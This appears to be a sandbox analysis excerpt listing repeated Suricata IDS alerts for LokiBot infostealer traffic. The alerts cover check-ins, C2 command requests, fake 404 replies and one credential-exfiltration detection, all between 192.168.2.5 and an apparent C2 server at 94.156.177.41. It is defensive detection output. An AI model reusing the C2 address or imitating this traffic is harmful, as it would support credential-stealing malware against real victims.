                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49781 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49781 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49739 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49718 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49711 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49711 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49713 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49733 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49733 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49713
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49714 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49712
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49715 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49721 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49785 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49724 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49745 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49711 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49745 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49711
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49745
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49727 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49781 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49718
                      Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49709 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49733 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49771 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49771 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49771 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49775 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49775 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49775 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49824 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49824 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49824 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49829 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49721
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49724 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49724 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49751 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49739 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49851 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49751
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49801 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49801 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49781 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49785 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49811 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49771 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49771
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49727
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49851 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49829 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49851 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49801 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49811 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49811 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49726 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49726 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49824 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49714
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49877 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49791 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49877 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49791 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49791 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49877 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49768 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49882 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49882 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49882 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49851 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49801 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49733
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49757 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49785 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49791 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49833 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49833 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49833 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49811 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49833 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49757 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49768 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49724
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49726 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49897 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49739
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49791
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49902 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49781
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49785 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49882 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49757 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49785
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49882
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49833
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49757 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49897 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49877 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49867 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49867 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49840 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49867 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49840 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49840 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49715
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49775 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49840 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49902 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49797 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49797 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49797 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49829 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49768 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49768 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49897 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49928 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49928 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49928 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49867 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49726
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49801
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49829 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49928 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49797 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49936 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49806 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49948 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49757
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49750 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49750 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49750 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49897 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49845 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49902 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49845 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49936 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49902 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49928
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49897
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49862 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49902
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49862 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49797
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49954 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49954 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49954 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49851
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49954 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49908 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49862 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49954
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49948 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49806 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49806 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49877
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49829
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49857 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49768
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49917 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49857 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49840
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49857 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49908 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49970 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49970 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49984 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49970 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49984 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49984 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49871 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49862 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49845 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49970 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49984 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49917 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49942 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49970
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49845 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49959 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49959 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49959 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49948 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49942 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49942 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49959 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49948 -> 94.156.177.41:80
